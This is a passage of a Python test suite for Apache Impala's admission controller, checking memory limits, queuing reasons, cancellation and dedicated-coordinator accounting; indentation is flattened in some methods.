pool_max_mem=40 * 1024 * 1024, proc_mem_limit=1024 * 1024 * 1024),
statestored_args=_STATESTORED_ARGS)
def test_memory_rejection(self, vector):
"""Test that rejection of queries based on reservation and estimates works as
expected. The test depends on scanner memory estimates, which different on remote
filesystems with different (synthetic) block sizes."""
# Test that the query will be rejected by admission control if:
# a) the largest per-backend min buffer reservation is larger than the query mem limit
# b) the largest per-backend min buffer reservation is larger than the
# buffer_pool_limit query option
# c) the cluster-wide min-buffer reservation size is larger than the pool memory
# resources.
self.run_test_case('QueryTest/admission-reject-min-reservation', vector)
# Test that queries are rejected based on memory estimates. Set num_nodes=1 to
# avoid unpredictability from scheduling on different backends.
exec_options = vector.get_value('exec_option')
exec_options['num_nodes'] = 1
self.run_test_case('QueryTest/admission-reject-mem-estimate', vector)
# Process mem_limit used in test_mem_limit_upper_bound
PROC_MEM_TEST_LIMIT = 1024 * 1024 * 1024
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1,
pool_max_mem=10 * PROC_MEM_TEST_LIMIT, proc_mem_limit=PROC_MEM_TEST_LIMIT))
def test_mem_limit_upper_bound(self, vector):
""" Test to ensure that a query is admitted if the requested memory is equal to the
process mem limit"""
query = "select * from functional.alltypesagg limit 1"
exec_options = vector.get_value('exec_option')
# Setting requested memory equal to process memory limit
exec_options['mem_limit'] = self.PROC_MEM_TEST_LIMIT
self.execute_query_expect_success(self.client, query, exec_options)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1,
pool_max_mem=10 * PROC_MEM_TEST_LIMIT, proc_mem_limit=PROC_MEM_TEST_LIMIT),
num_exclusive_coordinators=1)
def test_mem_limit_dedicated_coordinator(self, vector):
"""Regression test for IMPALA-8469: coordinator fragment should be admitted on
dedicated coordinator"""
query = "select * from functional.alltypesagg limit 1"
exec_options = vector.get_value('exec_option')
# Test both single-node and distributed plans
for num_nodes in [0, 1]:
# Memory just fits in memory limits
exec_options['mem_limit'] = self.PROC_MEM_TEST_LIMIT
exec_options['num_nodes'] = num_nodes
self.execute_query_expect_success(self.client, query, exec_options)
# A bit too much memory to run on coordinator.
exec_options['mem_limit'] = long(self.PROC_MEM_TEST_LIMIT * 1.1)
ex = self.execute_query_expect_failure(self.client, query, exec_options)
assert ("Rejected query from pool default-pool: request memory needed "
"1.10 GB is greater than memory available for admission 1.00 GB" in
str(ex)), str(ex)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="mem-limit-test-fair-scheduler.xml",
llama_site_file="mem-limit-test-llama-site.xml"), num_exclusive_coordinators=1,
cluster_size=2)
def test_dedicated_coordinator_mem_accounting(self, vector):
"""Verify that when using dedicated coordinators, the memory admitted for and the
mem limit applied to the query fragments running on the coordinator is different than
the ones on executors."""
self.__verify_mem_accounting(vector, using_dedicated_coord_estimates=True)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="mem-limit-test-fair-scheduler.xml",
llama_site_file="mem-limit-test-llama-site.xml")
+ " -use_dedicated_coordinator_estimates false",
num_exclusive_coordinators=1,
cluster_size=2)
def test_dedicated_coordinator_legacy_mem_accounting(self, vector):
"""Verify that when using dedicated coordinators with specialized dedicated coord
estimates turned off using a hidden startup param, the memory admitted for and the
mem limit applied to the query fragments running on the coordinator is the same
(as expected from legacy behavior)."""
self.__verify_mem_accounting(vector, using_dedicated_coord_estimates=False)
  @SkipIfNotHdfsMinicluster.tuned_for_minicluster
  @pytest.mark.execute_serially
  @CustomClusterTestSuite.with_args(
      impalad_args=impalad_admission_ctrl_config_args(
          fs_allocation_file="mem-limit-test-fair-scheduler.xml",
          llama_site_file="mem-limit-test-llama-site.xml"), num_exclusive_coordinators=1,
      cluster_size=2)
  def test_sanity_checks_dedicated_coordinator(self, vector, unique_database):
    """Sanity tests for verifying targeted dedicated coordinator memory estimations and
    behavior."""
    self.client.set_configuration_option('request_pool', "root.regularPool")
    ImpalaTestSuite.change_database(self.client, vector.get_value('table_format'))
    exec_options = vector.get_value('exec_option')
    # Make sure query option MAX_MEM_ESTIMATE_FOR_ADMISSION is enforced on the dedicated
    # coord estimates. Without this query option the estimate would be > 100MB.
    expected_mem = 60 * (1 << 20) # 60MB
    exec_options['MAX_MEM_ESTIMATE_FOR_ADMISSION'] = expected_mem
    self.client.set_configuration(exec_options)
    handle = self.client.execute_async(QUERY.format(1))
    self.client.wait_for_finished_timeout(handle, 1000)
    # With the cap in place, both coordinator and executor mem-to-admit should equal
    # the capped estimate.
    mem_to_admit = self.__get_mem_limits_admission_debug_page()
    assert abs(mem_to_admit['coordinator'] - expected_mem) < 0.0001,\
      "mem_to_admit:" + str(mem_to_admit)
    assert abs(mem_to_admit['executor'] - expected_mem) < 0.0001, \
      "mem_to_admit:" + str(mem_to_admit)
    self.client.close_query(handle)
    # If the query is only scheduled on the coordinator then the mem to admit on executor
    # should be zero.
    exec_options['NUM_NODES'] = 1
    self.client.set_configuration(exec_options)
    handle = self.client.execute_async(QUERY.format(1))
    self.client.wait_for_finished_timeout(handle, 1000)
    mem_to_admit = self.__get_mem_limits_admission_debug_page()
    assert abs(mem_to_admit['coordinator'] - expected_mem) < 0.0001, \
      "mem_to_admit:" + str(mem_to_admit)
    assert abs(mem_to_admit['executor'] - 0) < 0.0001, \
      "mem_to_admit:" + str(mem_to_admit)
    self.client.close_query(handle)
    # Make sure query execution works perfectly for a query that does not have any
    # fragments scheduled on the coordinator, but has runtime-filters that need to be
    # aggregated at the coordinator.
    exec_options = vector.get_value('exec_option')
    exec_options['RUNTIME_FILTER_WAIT_TIME_MS'] = 30000
    query = """CREATE TABLE {0}.temp_tbl AS SELECT STRAIGHT_JOIN o_orderkey
        FROM tpch_parquet.lineitem INNER JOIN [SHUFFLE] tpch_parquet.orders
        ON o_orderkey = l_orderkey GROUP BY 1""".format(unique_database)
    result = self.execute_query_expect_success(self.client, query, exec_options)
    assert "Runtime filters: All filters arrived" in result.runtime_profile
  def __verify_mem_accounting(self, vector, using_dedicated_coord_estimates):
    """Helper method used by test_dedicated_coordinator_*_mem_accounting that verifies
    the actual vs expected values for mem admitted and mem limit for both coord and
    executor. Also verifies that those memory values are different if
    'using_dedicated_coord_estimates' is true."""
    self.client.set_configuration_option('request_pool', "root.regularPool")
    ImpalaTestSuite.change_database(self.client, vector.get_value('table_format'))
    handle = self.client.execute_async(QUERY.format(1))
    self.client.wait_for_finished_timeout(handle, 1000)
    # Expected values come from the admission controller's debug page on the
    # coordinator; actual values come from the mem-tracker output on each daemon's
    # memz page; mem admitted comes from the backends debug page.
    expected_mem_limits = self.__get_mem_limits_admission_debug_page()
    actual_mem_limits = self.__get_mem_limits_memz_debug_page(handle.get_handle().id)
    mem_admitted = get_mem_admitted_backends_debug_page(self.cluster)
    debug_string = " expected_mem_limits:" + str(
      expected_mem_limits) + " actual_mem_limits:" + str(
      actual_mem_limits) + " mem_admitted:" + str(mem_admitted)
    MB = 1 << 20
    # Easiest way to check float in-equality. Coordinator and executor limits must
    # differ only when dedicated-coordinator estimates are in use.
    assert abs(expected_mem_limits['coordinator'] - expected_mem_limits[
      'executor']) > 0.0001 or not using_dedicated_coord_estimates, debug_string
    # There may be some rounding errors so keep a margin of 5MB when verifying
    assert abs(actual_mem_limits['coordinator'] - expected_mem_limits[
      'coordinator']) < 5 * MB, debug_string
    assert abs(actual_mem_limits['executor'] - expected_mem_limits[
      'executor']) < 5 * MB, debug_string
    assert abs(mem_admitted['coordinator'] - expected_mem_limits[
      'coordinator']) < 5 * MB, debug_string
    assert abs(
      mem_admitted['executor'][0] - expected_mem_limits['executor']) < 5 * MB, \
      debug_string
def __get_mem_limits_admission_debug_page(self):
"""Helper method assumes a 2 node cluster using a dedicated coordinator. Returns the
mem_limit calculated by the admission controller from the impala admission debug page
of the coordinator impala daemon. Returns a dictionary with the keys 'coordinator'
and 'executor' and their respective mem values in bytes."""
# Based on how the cluster is setup, the first impalad in the cluster is the
# coordinator.
response_json = self.cluster.impalads[0].service.get_debug_webpage_json("admission")
assert 'resource_pools' in response_json
assert len(response_json['resource_pools']) == 1
assert response_json['resource_pools'][0]['running_queries']
assert len(response_json['resource_pools'][0]['running_queries']) == 1
query_info = response_json['resource_pools'][0]['running_queries'][0]
return {'coordinator': float(query_info["coord_mem_to_admit"]),
'executor': float(query_info["mem_limit"])}
def __get_mem_limits_memz_debug_page(self, query_id):
"""Helper method assumes a 2 node cluster using a dedicated coordinator. Returns the
mem limits enforced on the query (identified by the 'query_id') extracted from
mem-tracker's output on the memz debug page of the dedicated coordinator and the
executor impala daemons. Returns a dictionary with the keys 'coordinator' and
'executor' and their respective mem values in bytes."""
metric_name = "Query({0})".format(query_id)
# Based on how the cluster is setup, the first impalad in the cluster is the
# coordinator.
mem_trackers = [MemUsageVerifier(i.service).get_mem_usage_values(metric_name) for i in
self.cluster.impalads]
return {'coordinator': float(mem_trackers[0]['limit']),
'executor': float(mem_trackers[1]['limit'])}
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(num_exclusive_coordinators=1)
def test_dedicated_coordinator_planner_estimates(self, vector, unique_database):
"""Planner tests to add coverage for coordinator estimates when using dedicated
coordinators. Also includes coverage for verifying cluster memory admitted."""
vector_copy = copy(vector)
exec_options = vector_copy.get_value('exec_option')
# Remove num_nodes from the options to allow test case runner to set it in one of
# the test cases.
del exec_options['num_nodes']
exec_options['num_scanner_threads'] = 1 # To make estimates consistently reproducible
self.run_test_case('QueryTest/dedicated-coord-mem-estimates', vector_copy,
unique_database)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(num_exclusive_coordinators=1, cluster_size=2)
def test_mem_limit_executors(self, vector, unique_database):
"""Verify that the query option mem_limit_executors is only enforced on the
executors."""
expected_exec_mem_limit = "999999999"
ImpalaTestSuite.change_database(self.client, vector.get_value('table_format'))
self.client.set_configuration({"MEM_LIMIT_EXECUTORS": expected_exec_mem_limit})
handle = self.client.execute_async(QUERY.format(1))
self.client.wait_for_finished_timeout(handle, 1000)
expected_mem_limits = self.__get_mem_limits_admission_debug_page()
assert expected_mem_limits['executor'] > expected_mem_limits[
'coordinator'], expected_mem_limits
assert expected_mem_limits['executor'] == float(
expected_exec_mem_limit), expected_mem_limits
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=2, max_queued=1,
pool_max_mem=10 * PROC_MEM_TEST_LIMIT,
queue_wait_timeout_ms=2 * STATESTORE_RPC_FREQUENCY_MS),
start_args="--per_impalad_args=-mem_limit=3G;-mem_limit=3G;-mem_limit=2G",
statestored_args=_STATESTORED_ARGS)
def test_heterogeneous_proc_mem_limit(self, vector):
""" Test to ensure that the admission controller takes into account the actual proc
mem limits of each impalad. Starts a cluster where the last impalad has a smaller
proc mem limit than other impalads and runs queries where admission/rejection decision
depends on the coordinator knowing the other impalad's mem limits.
The queue_wait_timeout_ms has been set to be more than the prioritized statestore
update time, so that the queries don't time out before receiving updates to pool
stats"""
# Choose a query that runs on all 3 backends.
query = "select * from functional.alltypesagg, (select 1) B limit 1"
# Successfully run a query with mem limit equal to the lowest process memory among
# impalads
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "2G"
self.execute_query_expect_success(self.client, query, exec_options)
# Test that a query scheduled to run on a single node and submitted to the impalad
# with higher proc mem limit succeeds.
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "3G"
exec_options['num_nodes'] = "1"
self.execute_query_expect_success(self.client, query, exec_options)
# Exercise rejection checks in admission controller.
try:
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "3G"
self.execute_query(query, exec_options)
except ImpalaBeeswaxException as e:
assert re.search("Rejected query from pool \S+: request memory needed 3.00 GB"
" is greater than memory available for admission 2.00 GB of \S+", str(e)), \
str(e)
# Exercise queuing checks in admission controller.
try:
# Wait for previous queries to finish to avoid flakiness.
for impalad in self.cluster.impalads:
impalad.service.wait_for_metric_value("impala-server.num-fragments-in-flight", 0)
impalad_with_2g_mem = self.cluster.impalads[2].service.create_beeswax_client()
impalad_with_2g_mem.set_configuration_option('mem_limit', '1G')
impalad_with_2g_mem.execute_async("select sleep(1000)")
# Wait for statestore update to update the mem admitted in each node.
sleep(STATESTORE_RPC_FREQUENCY_MS / 1000)
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "2G"
# Since Queuing is synchronous and we can't close the previous query till this
# returns, we wait for this to timeout instead.
self.execute_query(query, exec_options)
except ImpalaBeeswaxException as e:
assert re.search("Queued reason: Not enough memory available on host \S+.Needed "
"2.00 GB but only 1.00 GB out of 2.00 GB was available.", str(e)), str(e)
finally:
if impalad_with_2g_mem is not None:
impalad_with_2g_mem.close()
  @pytest.mark.execute_serially
  @CustomClusterTestSuite.with_args(
      impalad_args="--logbuflevel=-1 " + impalad_admission_ctrl_flags(max_requests=1,
          max_queued=1, pool_max_mem=PROC_MEM_TEST_LIMIT),
      statestored_args=_STATESTORED_ARGS)
  def test_cancellation(self):
    """ Test to confirm that all Async cancellation windows are hit and are able to
    succesfully cancel the query"""
    impalad = self.cluster.impalads[0]
    client = impalad.service.create_beeswax_client()
    try:
      # Window 1: cancelled while sleeping before the admission decision; the
      # mem_limit exceeds the process limit so it would have been rejected.
      client.set_configuration_option("debug_action", "CRS_BEFORE_ADMISSION:SLEEP@2000")
      client.set_configuration_option("mem_limit", self.PROC_MEM_TEST_LIMIT + 1)
      handle = client.execute_async("select 1")
      sleep(1)
      client.close_query(handle)
      self.assert_impalad_log_contains('INFO',
          "Ready to be Rejected but already cancelled, query id=")
      # Window 2: cancelled before admission of a query that would have been admitted
      # immediately (mem_limit cleared first).
      client.clear_configuration()
      client.set_configuration_option("debug_action", "CRS_BEFORE_ADMISSION:SLEEP@2000")
      handle = client.execute_async("select 2")
      sleep(1)
      client.close_query(handle)
      self.assert_impalad_log_contains('INFO',
          "Ready to be Admitted immediately but already cancelled, query id=")
      # Window 3: cancelled just before the coordinator starts.
      client.set_configuration_option("debug_action",
          "CRS_BEFORE_COORD_STARTS:SLEEP@2000")
      handle = client.execute_async("select 3")
      sleep(1)
      client.close_query(handle)
      self.assert_impalad_log_contains('INFO',
          "Cancelled right after starting the coordinator query id=")
      # Window 4: cancelled just after the coordinator starts; logs the same line, so
      # expect a second occurrence.
      client.set_configuration_option("debug_action", "CRS_AFTER_COORD_STARTS:SLEEP@2000")
      handle = client.execute_async("select 4")
      sleep(1)
      client.close_query(handle)
      self.assert_impalad_log_contains('INFO',
          "Cancelled right after starting the coordinator query id=", 2)
      # Window 5: cancel a query while it is queued behind a running query.
      client.clear_configuration()
      handle = client.execute_async("select sleep(10000)")
      client.set_configuration_option("debug_action",
          "AC_AFTER_ADMISSION_OUTCOME:SLEEP@2000")
      queued_query_handle = client.execute_async("select 5")
      sleep(1)
      assert client.get_state(queued_query_handle) == QueryState.COMPILED
      assert "Admission result: Queued" in client.get_runtime_profile(queued_query_handle)
      # Only cancel the queued query, because close will wait till it unregisters, this
      # gives us a chance to close the running query and allow the dequeue thread to
      # dequeue the queue query
      client.cancel(queued_query_handle)
      client.close_query(handle)
      client.close_query(queued_query_handle)
      queued_profile = client.get_runtime_profile(queued_query_handle)
      assert "Admission result: Cancelled (queued)" in queued_profile, queued_profile
      self.assert_impalad_log_contains('INFO', "Dequeued cancelled query=")
      # Window 6: close (rather than cancel) a queued query while the query ahead of it
      # is still running.
      client.clear_configuration()
      handle = client.execute_async("select sleep(10000)")
      queued_query_handle = client.execute_async("select 6")
      sleep(1)
      assert client.get_state(queued_query_handle) == QueryState.COMPILED
      assert "Admission result: Queued" in client.get_runtime_profile(queued_query_handle)
      client.close_query(queued_query_handle)
      client.close_query(handle)
      queued_profile = client.get_runtime_profile(queued_query_handle)
      assert "Admission result: Cancelled (queued)" in queued_profile
      # Finally all fragments must drain and the admission metrics must reconcile:
      # 4 queries admitted, 2 queued, none still running.
      for i in self.cluster.impalads:
        i.service.wait_for_metric_value("impala-server.num-fragments-in-flight", 0)
      assert self.cluster.impalads[0].service.get_metric_value(
          "admission-controller.agg-num-running.default-pool") == 0
      assert self.cluster.impalads[0].service.get_metric_value(
          "admission-controller.total-admitted.default-pool") == 4
      assert self.cluster.impalads[0].service.get_metric_value(
          "admission-controller.total-queued.default-pool") == 2
    finally:
      client.close()
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=10,
pool_max_mem=1024 * 1024 * 1024),
statestored_args=_STATESTORED_ARGS)
def test_queue_reasons_num_queries(self):
"""Test that queue details appear in the profile when queued based on num_queries."""
# Run a bunch of queries - one should get admitted immediately, the rest should
# be dequeued one-by-one.
STMT = "select sleep(1000)"
TIMEOUT_S = 60
EXPECTED_REASON = \
"Latest admission queue reason: number of running queries 1 is at or over limit 1"
NUM_QUERIES = 5
profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)],
TIMEOUT_S)
num_reasons = len([profile for profile in profiles if EXPECTED_REASON in profile])
assert num_reasons == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
init_queue_reasons = self.__extract_init_queue_reasons(profiles)
assert len(init_queue_reasons) == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
over_limit_details = [detail
for detail in init_queue_reasons if 'number of running queries' in detail]
assert len(over_limit_details) == 1, \
"One query initially queued because of num_queries: " + '\n===\n'.join(profiles)
queue_not_empty_details = [detail
for detail in init_queue_reasons if 'queue is not empty' in detail]
assert len(queue_not_empty_details) == NUM_QUERIES - 2, \
"Others queued because of non-empty queue: " + '\n===\n'.join(profiles)
  @pytest.mark.execute_serially
  @CustomClusterTestSuite.with_args(
      impalad_args=impalad_admission_ctrl_flags(max_requests=10, max_queued=10,
          pool_max_mem=10 * 1024 * 1024),
      statestored_args=_STATESTORED_ARGS)
  def test_queue_reasons_memory(self):
    """Test that queue details appear in the profile when queued based on memory."""
    # Run a bunch of queries with mem_limit set so that only one can be admitted at a
    # time- one should get admitted immediately, the rest should be dequeued one-by-one.
    # (9MB per query against the 10MB pool means at most one query fits at once.)
    STMT = "select sleep(100)"
    TIMEOUT_S = 60
    EXPECTED_REASON = "Latest admission queue reason: Not enough aggregate memory " +\
        "available in pool default-pool with max mem resources 10.00 MB. Needed 9.00 MB" \
        " but only 1.00 MB was available."
    NUM_QUERIES = 5
    profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)],
        TIMEOUT_S, {'mem_limit': '9mb'})
    # Every query but the first must carry the memory-based queue reason.
    num_reasons = len([profile for profile in profiles if EXPECTED_REASON in profile])
    assert num_reasons == NUM_QUERIES - 1, \
        "All queries except first should have been queued: " + '\n===\n'.join(profiles)
    init_queue_reasons = self.__extract_init_queue_reasons(profiles)
    assert len(init_queue_reasons) == NUM_QUERIES - 1, \
        "All queries except first should have been queued: " + '\n===\n'.join(profiles)
    # Exactly one query was queued directly because of memory; the others were queued
    # because the queue was already non-empty.
    over_limit_details = [detail for detail in init_queue_reasons
        if 'Not enough aggregate memory available' in detail]
    assert len(over_limit_details) == 1, \
        "One query initially queued because of memory: " + '\n===\n'.join(profiles)
    queue_not_empty_details = [detail
        for detail in init_queue_reasons if 'queue is not empty' in detail]
    assert len(queue_not_empty_details) == NUM_QUERIES - 2, \
        "Others queued because of non-empty queue: " + '\n===\n'.join(profiles)
def __extract_init_queue_reasons(self, profiles):
"""Return a list of the 'Admission Queue details' strings found in 'profiles'"""
matches = [re.search(INITIAL_QUEUE_REASON_REGEX, profile) for profile in profiles]
return [match.group(0) for match in matches if match is not None]
  @pytest.mark.execute_serially
  @CustomClusterTestSuite.with_args(
      impalad_args=impalad_admission_ctrl_flags(max_requests=100, max_queued=10,
          pool_max_mem=-1, admission_control_slots=4,
          executor_groups="default-pool-group1"),
      statestored_args=_STATESTORED_ARGS)
  def test_queue_reasons_slots(self):
    """Test that queue details appear in the profile when queued based on number of
    slots."""
    # Run a bunch of queries - one should get admitted immediately, the rest should
    # be dequeued one-by-one. With mt_dop=4 each query consumes all 4 admission
    # control slots on a host.
    STMT = "select min(ss_wholesale_cost) from tpcds_parquet.store_sales"
    TIMEOUT_S = 60
    EXPECTED_REASON = "Latest admission queue reason: Not enough admission control " +\
        "slots available on host"
    NUM_QUERIES = 5
    profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)],
        TIMEOUT_S, config_options={"mt_dop": 4})
    # Every query but the first must carry the slot-based queue reason.
    num_reasons = len([profile for profile in profiles if EXPECTED_REASON in profile])
    assert num_reasons == NUM_QUERIES - 1, \
        "All queries except first should have been queued: " + '\n===\n'.join(profiles)
    init_queue_reasons = self.__extract_init_queue_reasons(profiles)
    assert len(init_queue_reasons) == NUM_QUERIES - 1, \
        "All queries except first should have been queued: " + '\n===\n'.join(profiles)
    # Exactly one query was queued directly because of slots; the others were queued
    # because the queue was already non-empty.
    over_limit_details = [detail
        for detail in init_queue_reasons
        if "Not enough admission control slots available on host" in detail]
    assert len(over_limit_details) == 1, \
        "One query initially queued because of slots: " + '\n===\n'.join(profiles)
    queue_not_empty_details = [detail
        for detail in init_queue_reasons if 'queue is not empty' in detail]
    assert len(queue_not_empty_details) == NUM_QUERIES - 2, \
        "Others queued because of non-empty queue: " + '\n===\n'.join(profiles)
    # Confirm that the cluster quiesces and all metrics return to zero.
    for impalad in self.cluster.impalads:
      verifier = MetricVerifier(impalad.service)
      verifier.wait_for_backend_admission_control_state()
  @pytest.mark.execute_serially
  @CustomClusterTestSuite.with_args(
      impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=10,
          pool_max_mem=1024 * 1024 * 1024),
      statestored_args=_STATESTORED_ARGS)
  def test_query_locations_correctness(self, vector):
    """Regression test for IMPALA-7516: Test to make sure query locations and in-flight
    queries are correct for different admission results that can affect it."""
    if self.exploration_strategy() != 'exhaustive':
      pytest.skip('runs only in exhaustive')
    # Choose a query that runs on all 3 backends.
    query = "select * from functional.alltypesagg A, (select sleep(10000)) B limit 1"
    # Case 1: When a query runs succesfully.
    handle = self.client.execute_async(query)
    self.__assert_num_queries_accounted(1)
    self.close_query(handle)
    self.__assert_num_queries_accounted(0)
    # Case 2: When a query is queued then cancelled. The first query occupies the
    # single admission slot (max_requests=1) so the second one must queue.
    handle_running = self.client.execute_async(query)
    self.client.wait_for_admission_control(handle_running)
    handle_queued = self.client.execute_async(query)
    self.client.wait_for_admission_control(handle_queued)
    self.impalad_test_service.wait_for_metric_value(
        "admission-controller.total-queued.default-pool", 1)
    # Queued queries don't show up on backends
    self.__assert_num_queries_accounted(1, 1)
    # First close the queued query
    self.close_query(handle_queued)
    self.close_query(handle_running)
    self.__assert_num_queries_accounted(0)
    # Case 3: When a query gets rejected (a 1-byte mem_limit cannot fit any query).
    exec_options = copy(vector.get_value('exec_option'))
    exec_options['mem_limit'] = "1b"
    self.execute_query_expect_failure(self.client, query, exec_options)
    self.__assert_num_queries_accounted(0)
def __assert_num_queries_accounted(self, num_running, num_queued=0):
"""Checks if the num of queries accounted by query_locations and in-flight are as
expected"""
# Wait for queries to start/un-register.
num_inflight = num_running + num_queued
assert self.impalad_test_service.wait_for_num_in_flight_queries(num_inflight)
query_locations = self.impalad_test_service.get_query_locations()
for host, num_q in query_locations.items():
assert num_q == num_running, "There should be {0} running queries on either " \
"impalads: {0}".format(query_locations)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="mem-limit-test-fair-scheduler.xml",
llama_site_file="mem-limit-test-llama-site.xml", make_copy=True),
statestored_args=_STATESTORED_ARGS)
def test_pool_mem_limit_configs(self, vector):
"""Runs functional tests for the max/min_query_mem_limit pool config attributes"""
exec_options = vector.get_value('exec_option')
# Set this to the default.
exec_options['exec_single_node_rows_threshold'] = 100
# Set num_nodes to 1 since its easier to see one-to-one mapping of per_host and
# per_cluster values used in the test.
exec_options['num_nodes'] = 1
self.run_test_case('QueryTest/admission-max-min-mem-limits', vector)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="mem-limit-test-fair-scheduler.xml",
llama_site_file="mem-limit-test-llama-site.xml",
additional_args="-default_pool_max_requests 1", make_copy=True),
statestored_args=_STATESTORED_ARGS)
def test_pool_config_change_while_queued(self, vector):
"""Tests that the invalid checks work even if the query is queued. Makes sure that a
queued query is dequeued and rejected if the config is invalid."""
pool_name = "invalidTestPool"
config_str = "max-query-mem-limit"
self.client.set_configuration_option('request_pool', pool_name)
# Setup to queue a query.
sleep_query_handle = self.client.execute_async("select sleep(10000)")
self.client.wait_for_admission_control(sleep_query_handle)
self.__wait_for_change_to_profile(sleep_query_handle,
"Admission result: Admitted immediately")
queued_query_handle = self.client.execute_async("select 2")
self.__wait_for_change_to_profile(queued_query_handle, "Admission result: Queued")
# Change config to be invalid.
llama_site_path = os.path.join(RESOURCES_DIR, "copy-mem-limit-test-llama-site.xml")
config = ResourcePoolConfig(self.cluster.impalads[0].service, llama_site_path)
config.set_config_value(pool_name, config_str, 1)
# Close running query so the queued one gets a chance.
self.client.close_query(sleep_query_handle)
# Observe that the queued query fails.
self.wait_for_state(queued_query_handle, QueryState.EXCEPTION, 20),
self.close_query(queued_query_handle)
# Change the config back to a valid value
config.set_config_value(pool_name, config_str, 0)
# Now do the same thing for change to pool.max-query-mem-limit such that it can no
# longer accommodate the largest min_reservation.
# Setup to queue a query.
sleep_query_handle = self.client.execute_async("select sleep(10000)")
self.client.wait_for_admission_control(sleep_query_handle)
queued_query_handle = self.client.execute_async(
"select * from functional_parquet.alltypes limit 1")
self.__wait_for_change_to_profile(queued_query_handle, "Admission result: Queued")
# Change config to something less than the what is required to accommodate the
# largest min_reservation (which in this case is 32.09 MB.
config.set_config_value(pool_name, config_str, 25 * 1024 * 1024)
# Close running query so the queued one gets a chance.
self.client.close_query(sleep_query_handle)
# Observe that the queued query fails.
self.wait_for_state(queued_query_handle, QueryState.EXCEPTION, 20),
self.close_query(queued_query_handle)
def __wait_for_change_to_profile(self, query_handle, search_string, timeout=20):
for _ in range(timeout * 10):
profile = self.client.get_runtime_profile(query_handle)
if search_string in profile:
return
sleep(0.1)
assert False, "Timed out waiting for change to profile\nSearch " \
"String: {0}\nProfile:\n{1}".format(search_string, str(profile))
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
  impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=10,
    pool_max_mem=1024 * 1024 * 1024))
@needs_session()
def test_queuing_status_through_query_log_and_exec_summary(self):
  """Test to verify that the HS2 client's GetLog() call and the ExecSummary expose
  the query's queuing status, that is, whether the query was queued and what was the
  latest queuing reason."""
  # Start a long running query.
  long_query_resp = self.execute_statement("select sleep(10000)")
  # Ensure that the query has started executing.
  self.wait_for_admission_control(long_query_resp.operationHandle)
  # Submit another query. With max_requests=1 it must wait behind the sleep query.
  queued_query_resp = self.execute_statement("select 1")
  # Wait until the query is queued (PENDING in HS2 terms).
  self.wait_for_operation_state(queued_query_resp.operationHandle,
      TCLIService.TOperationState.PENDING_STATE)
  # Check whether the query log message correctly exposes the queuing status.
  get_log_req = TCLIService.TGetLogReq()
  get_log_req.operationHandle = queued_query_resp.operationHandle
  log = self.hs2_client.GetLog(get_log_req).log
  assert "Admission result : Queued" in log, log
  # BUG FIX: previously these two string literals were separate statements (no
  # parentheses/backslash), so the assert only checked the always-truthy first
  # literal and the '... limit 1' suffix was never verified. Parenthesize so the
  # implicit string concatenation forms a single operand of 'in'.
  assert ("Latest admission queue reason : number of running queries 1 is at or over "
          "limit 1") in log, log
  # Now check the same for ExecSummary.
  summary_req = ImpalaHiveServer2Service.TGetExecSummaryReq()
  summary_req.operationHandle = queued_query_resp.operationHandle
  summary_req.sessionHandle = self.session_handle
  exec_summary_resp = self.hs2_client.GetExecSummary(summary_req)
  assert exec_summary_resp.summary.is_queued
  assert "number of running queries 1 is at or over limit 1" in \
      exec_summary_resp.summary.queued_reason,\
      exec_summary_resp.summary.queued_reason
  # Close the running query.
  self.close(long_query_resp.operationHandle)
  # Close the queued query.
  self.close(queued_query_resp.operationHandle)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
  impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=3,
    pool_max_mem=1024 * 1024 * 1024) +
    " --admission_control_stale_topic_threshold_ms={0}".format(
      STALE_TOPIC_THRESHOLD_MS),
  statestored_args=_STATESTORED_ARGS)
def test_statestore_outage(self):
  """Test behaviour with a failed statestore. Queries should continue to be admitted
  but we should generate diagnostics about the stale topic."""
  self.cluster.statestored.kill()
  impalad = self.cluster.impalads[0]
  # Sleep until the update should be definitely stale.
  sleep(STALE_TOPIC_THRESHOLD_MS / 1000. * 1.5)
  # The /admission debug page must report how long ago the last statestore update
  # arrived and include a human-readable staleness warning.
  ac_json = impalad.service.get_debug_webpage_json('/admission')
  ms_since_update = ac_json["statestore_admission_control_time_since_last_update_ms"]
  assert ms_since_update > STALE_TOPIC_THRESHOLD_MS
  assert ("Warning: admission control information from statestore is stale:" in
      ac_json["statestore_update_staleness_detail"])

